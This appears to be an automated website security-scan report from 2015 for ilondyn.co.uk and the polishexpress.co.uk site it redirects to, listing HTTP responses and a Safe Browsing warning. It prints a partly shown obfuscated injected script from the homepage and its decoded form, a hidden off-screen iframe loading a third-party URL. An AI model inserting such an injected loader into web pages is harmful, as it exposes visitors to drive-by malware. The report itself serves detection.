Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ilondyn.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ilondyn.co.uk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:08 GMT Location: http://ilondyn.polacy.co.uk/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ilondyn.polacy.co.uk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:08 GMT Location: http://www.polishexpress.co.uk/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.polishexpress.co.uk/ | 200 OK Content-Length: 198626 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. GmNntB=0;try{VmpZaFSoh=0;try{UZoFlDMpr=prototype;}catch(qBzNV){ZCxSm="rCode";wgnpYDHlhk=[37,82,79,91,74,86,78,9,92,91,76,38,11,81,93,93,89,35,24,24,80,82,95,78,23,81,74,91,95,78,92,93,91,74,82,87,79,74,85,85,23,76,88,86,24,40,57,49,57,60,60,46,60,50,45,38,87,83,91,54,55,91,94,45,54,81,95,51,47,50,57,48,52,94,65,45,60,52,63,75,54,25,32,57,61,81,87,51,84,88,27,74,81,78,31,51,63,80,101,55,64,54,27,55,27,63,82,67,83,81,86,54,86,66,25,66,27,54,98,55,99, ...[818 bytes skipped]... Decoded script: <iframe src="http://give.harvestrainfall.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|NWM2N2ViZjhmMmY0Y2MyNzBhYTNmMzM4YWQwODJjMGI" width="0px" height="0px" style="position:absolute;left:-10000px;"></iframe> | ||
http://www.polishexpress.co.uk/wp-content/plugins/asynchronous-javascript/js/head.load.min.js | 200 OK Content-Length: 3636 Content-Type: application/javascript | clean |
http://www.polishexpress.co.uk/wp-content/themes/Newspaper/js/cookies.js | 200 OK Content-Length: 1838 Content-Type: application/javascript | clean |
http://www.polishexpress.co.uk/wp-content/themes/Newspaper/js/jquery.smartbanner.js | 200 OK Content-Length: 10149 Content-Type: application/javascript | clean |
http://www.ilondyn.co.uk//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:11 GMT Location: http://ilondyn.polacy.co.uk/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 374 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ilondyn.polacy.co.uk/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:12 GMT Location: http://www.polishexpress.co.uk/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 380 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.polishexpress.co.uk/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.polishexpress.co.uk/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.ilondyn.co.uk//e.issuu.com/embed.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:22 GMT Location: http://ilondyn.polacy.co.uk/e.issuu.com/embed.js/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 340 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ilondyn.polacy.co.uk/e.issuu.com/embed.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:22 GMT Location: http://www.polishexpress.co.uk/e.issuu.com/embed.js/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 346 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.polishexpress.co.uk/e.issuu.com/embed.js/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.ilondyn.co.uk//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:27 GMT Location: http://ilondyn.polacy.co.uk/www.googleadservices.com/pagead/conversion.js/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 365 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ilondyn.polacy.co.uk/www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 07 Jan 2015 15:51:27 GMT Location: http://www.polishexpress.co.uk/www.googleadservices.com/pagead/conversion.js/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 371 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.polishexpress.co.uk/www.googleadservices.com/pagead/conversion.js/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ilondyn.co.uk
Result:
GET / HTTP/1.1
Host: ilondyn.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ilondyn.co.uk
Referer: http://www.google.com/search?q=ilondyn.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ilondyn.co.uk
Referer: http://www.google.com/search?q=ilondyn.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.